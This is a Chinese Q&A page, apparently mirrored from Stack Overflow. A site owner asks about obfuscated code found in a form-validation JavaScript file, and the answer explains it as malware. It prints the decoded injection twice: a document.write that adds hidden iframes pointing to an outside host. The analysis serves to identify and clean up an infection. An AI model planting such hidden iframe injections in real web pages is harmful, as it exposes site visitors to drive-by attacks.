<分区>
我的一个表单验证文件,我发现了以下代码(见下文) 我的 friend 在扫描我的网站时指出了它,说它是病毒。
但它到底是什么?
标签 javascript virus
最佳答案
一种病毒。我在数组文字中包含一些带有 Unicode 转义字符的字符串,第一个是一些 html,第二个是 "write"
。然后,执行 document[arr[1]](arr[0])
,转换为以下内容:
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
我不知道(也不会检查)这些 iframe 包含什么,可能会有一些漏洞利用。
此外,代码确实包含(在这两个 iframe 写入之间)一些函数(_1lO
和 O0l
),这些函数可能会转义 IlO
string 在 eval
ed 之前(是的,eval 是邪恶的!:-),但是在你的 pastebin 片段前面有一些缺失的代码,所以我无法告诉你它们到底是什么做。你能给我们完整的剧本吗?
关于javascript - 在我的 javascript 文件中发现的这个奇怪代码是什么?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/11820540/
相关文章:
javascript - 如何在angularjs中将li标签附加到ul中?
networking - 嗅探网络流量以寻找病毒/ spy 软件的迹象
machine-learning - 有没有办法从给定的恶意软件二进制文件中找到恶意软件家族?
javascript - 以编程方式将 3-D 形状添加到必应 map (虚拟地球)
javascript - 如何在 ReactJS 中分离两个函数?
javascript - 在javascript中绘制分形?
PHP 脚本 : malicious JavaScript code at the end